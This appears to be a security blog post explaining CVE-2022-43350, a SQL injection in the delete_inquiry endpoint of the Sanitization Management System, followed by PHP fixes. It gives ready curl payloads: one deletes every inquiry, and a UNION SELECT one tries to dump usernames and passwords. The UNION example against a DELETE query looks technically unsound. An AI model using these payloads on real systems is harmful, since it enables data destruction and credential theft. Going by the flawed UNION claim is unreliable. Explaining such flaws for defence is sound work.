*Published: June 2024*
In the world of software security, even small web apps can harbor big vulnerabilities. Today, we break down CVE-2022-43350, a SQL injection vulnerability discovered in the *Sanitization Management System v1.*—a system often used to schedule and track cleaning activities in workplaces and public buildings.
If you run or use this system, knowing about this flaw is critical, and we'll walk you through what happened, show you real code, and explain how attackers can exploit it.
Quick Overview: What Is CVE-2022-43350?
CVE-2022-43350 is a vulnerability that allows an unauthenticated attacker to execute arbitrary SQL commands by manipulating the id parameter in a specific HTTP request:
/php-sms/classes/Master.php?f=delete_inquiry
An attacker can send a specially crafted parameter, tricking the database into running malicious commands. The result? Information theft, data loss, or even complete server control.
How Does the Vulnerability Work?
Sanitization Management System v1. lets administrators manage cleaning inquiries. To delete an inquiry, it provides a PHP endpoint:
/php-sms/classes/Master.php?f=delete_inquiry&id=1
The problem is *the id parameter is not sanitized or validated*. If a user puts something unexpected in id, the application passes it straight into an SQL query. It's like giving the attacker direct access to your database with no filter in between.
The code handling the request might look like this
// Master.php (simplified for clarity)
if($_GET['f'] == 'delete_inquiry'){
$id = $_GET['id'];
// SQL query with NO sanitization!
$sql = "DELETE FROM inquiries WHERE id = $id";
// Database execution
mysqli_query($conn, $sql);
// Response
echo "Inquiry deleted!";
}
What's Wrong?
The $id variable is used directly in the SQL query—no checks, no cleaning. That means an attacker could send something like id=1 OR 1=1, and the server would try to run:
DELETE FROM inquiries WHERE id = 1 OR 1=1
That deletes all records in the table, and that’s just the beginning.
1. Normal Request (what the developer expects)
curl "http://example.com/php-sms/classes/Master.php?f=delete_inquiry&id=5";
*Deletes inquiry with id=5.*
2. Malicious Request (SQL Injection)
curl "http://example.com/php-sms/classes/Master.php?f=delete_inquiry&id=5%20OR%201=1";
You might even expose sensitive data
curl "http://example.com/php-sms/classes/Master.php?f=delete_inquiry&id=5%20UNION%20SELECT%201,username,password%20FROM%20users";
- With errors or responses visible, an attacker might see usernames and passwords pop up in the output.
Data theft: Sensitive data could be dumped.
- Privilege escalation: If linked to other SQL queries, attackers might create new admin users or access private data.
How to Fix It
1. Use Prepared Statements
Never insert user input directly into SQL commands. Always use prepared statements or parameterized queries. Here’s how to safely do it in PHP:
$stmt = $conn->prepare("DELETE FROM inquiries WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
2. Validate Input
Check that id is really a number before doing anything
$id = intval($_GET['id']);
3. Least Privilege
Make sure the database user the app uses cannot DROP tables, DELETE everything, or access other databases unless absolutely necessary.
References & Further Reading
- NVD CVE-2022-43350 Listing
- Exploit Database Entry
- OWASP: SQL Injection
- Official Sanitization Management System v1. Project (archive)
Conclusion
CVE-2022-43350 is a loud reminder: always sanitize and validate input in your PHP apps!
Even a “small” management tool, if exposed, can be a big problem.
If you use this system, patch it ASAP or apply the code fixes above. Don’t let your data get swept away by a simple mistake!
*Have questions or need help hardening your web app? Leave a comment below!*
Timeline
Published on: 11/07/2022 15:15:00 UTC
Last modified on: 11/08/2022 04:19:00 UTC